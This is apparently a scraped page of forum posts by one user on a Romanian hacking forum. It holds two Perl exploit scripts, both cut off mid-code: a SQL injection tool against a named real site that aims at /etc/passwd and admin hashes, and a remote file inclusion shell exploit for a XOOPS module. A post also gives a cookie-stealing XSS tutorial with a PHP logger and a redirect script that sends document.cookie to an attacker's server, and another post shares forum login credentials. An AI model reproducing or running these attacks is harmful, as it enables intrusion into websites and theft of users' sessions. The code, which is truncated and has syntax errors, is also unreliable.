Kg06PLEKpbXtLlKSpVlNk40GlNMlKph7xXkS9lKOplpS0C0s0lKBHwLaODqkFsPrvk9ZXosO0sKV01xan jxKRt3U8J8inlJTNRwyoywBCPaplAsdnQuRX1uWpc/test.zip">test</a> </body></html>
-
Preview http://rapidshare.com/files/92994953/1.bmp.html DW http://www.pagegangster.com/shop/publications/view/15521/ Cere sa te autentifici ,logati-va cu datele astea sa o rasfoiti.. Username: flo_flow_supremacy Password: 4319 O colaborare in nr 4 fratilor.. DW link http://rapidshare.com/files/93400638/Co0de-Magazine-NR3.pdf.html
-
#!/usr/bin/perl#You can get admin hash,or acces the pass file from the *NIx #with the generated strings with the generator.c program #you have to put in sql specific comands,my example is for #tables and *NIX pass #exploit tested on winxp sp2 # #include<stdio.h> # #include<stdlib.h> # #include<string.h> # int main() # { char st[1024]; # int le; # printf("Input : "); # gets(st); # for(le=0;le<strlen(st);le++) # { printf("%d,",st[le]); # } # system("pause"); # return 0; # } #101,116,99,47,112,97,115,115,119,100 = /etc/passwd #If we would do this : #http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/* #we create 8 tables ,to see the result type : #-1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/* print "......Start.......\n"; print ".................\n"; print ". fl0 fl0w .\n"; print ". found by fl0w fl0w\n"; print ". c0ded by fl0 fl0w\n"; print ".......Email me at flo[underscore]flow[underscore]supremacy[dot]com\n\n"; print ".................\n\n"; use LWP::UserAgent; $site=@ARGV[0]; $shells=@ARGV[1]; $shellcmd=@ARGV[2]; if($site!~/http:\/\// || $site!~/http:\/\// || !$shells) { routine() } header(); while() { print"[shell] \$"; while(<STDIN>) { $cmd=$_; chomp($cmd); $sploit=LWP::UserAgent->new() or die; $requesting=HTTP::Request->new(GET=>$site.'/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*'.$shells.'?&'.$shellcmd.'='.$cmd) or die"\n\n NOT CONNECTED\n"; $re=$sploit->request(requesting); $i=$re->content; $i=~tr/[\n]/[
-
#!/usr/bin/perl sub header() { print q { ========================================================================= XOOPS modules xfsection 1.01 =>Remote File Inclusion Exploit Exploit Coded by fl0 fl0w flo_flow_supremacy[at]yahoo[dot]com PoC:http://site.com/modules/xfsection/modify.php?dir_module=evilShell? Demo:http://www.homu.net/modules/xfsection/modify.php?dir_module=SHELL? ========================================================================= } } sub routine() { header(); print q { ====================================================================================================== USAGE: perl exploit.pl <http://site.com/modules/xfsection/modify.php?dir_module=shell?&cmdvar=command> EXAMPLE: perl [localhost\][path] exploit.pl http://site.com/ ====================================================================================================== }; exit(); } use LWP::UserAgent; $site=@ARGV[0]; $shells=@ARGV[1]; $shellcmd=@ARGV[2]; if($site!~/http:\/\// || $site!~/http:\/\// || !$shells) { routine() } header(); while() { print"[shell] \$"; while(<STDIN>) { $cmd=$_; chomp($cmd); $sploit=LWP::UserAgent->new() or die; $requesting=HTTP::Request->new(GET=>$site.'/modules/xfsection/modify.php?dir_module='.$shells.'?&'.$shellcmd.'='.$cmd) or die"\n\n NOT CONNECTED\n"; $re=$sploit->request(requesting); $i=$re->content; $i=~tr/[\n]/[
-
Cele mai folosite Metode pentru a penetra un web-server
fl0 fl0w replied to buRn's topic in Tutoriale in romana
EN Version. http://rapidshare.com/files/35582872/The_most_used_methods_to_penetrate_a_web_server_By_fl0_fl0w_.pdf.html -
Hacking'ul nu se poate defini ,hacking is a state of mind.Un hacker este o persoana care exploateaza fiecare detaliu a unui sistem de calcul si care prin programare inbunatateste codurile.
-
Da ,da cum sa nu ..asa e .Probabil ai stat vreo 3 saptamani ca sa iti dai seama ..de cand l-am pus.
-
Vrajeala ,nu ai facut nimic decat sa iti scoti limitarea de 80% de pe bandswitch care oricum era folosita in regim de 'urgenta'. Bullshit!
-
Pentru a exploata un site vulnerabil trebuie sa injectezi scripturi pentru a culege user imput.Pentru cookiuri la fel trebuie sa folosesti un limbaj de scripting in primul rand ,logic si inainte sa testezi. Testezi cu un alert ,apoi treci la lucru. Faci o cerere GET catre locul unde sunt stocate : ['cookie'] ,copiezi intr-o variabila cea ce gasesti,apoi directionezi acel continut undeva. Faci o schema URL ,apoi si o postezi in forumul ,guesstbook'ul ,site'ul respectiv. Un astfel de script arata : O sa folosesc php. <?php $a=$_GET('cookie'); $b=fopen("cookies.txt","c"); fwrite($b.$cookie); f.close($; ?> Salvezi aa.php . Schema url + cum o plantam : <script> window.location="http://site_unde_ai_uploadat_scriptul.com/aa.php?cookie='+'document.cookie; </script> Scuze daca am scris nush cum ,m-a grabesc.
-
video tutorial [vbulletin hacking] by fl0 fl0w
fl0 fl0w replied to fl0 fl0w's topic in Tutoriale video
@Spy_bit pt ca am luat cu /vbulletin si nu trebuia ,am vazut dupa.Documenteaza-te despre anonimitate si navigare pe internet,servere proxy etc inainte sa intrebi chestii de genul asta. -
Am pus si active perl ,mplayer se vede cel mai bine. http://rapidshare.com/files/31089970/video_tutorial.fl0.fl0w.rar.html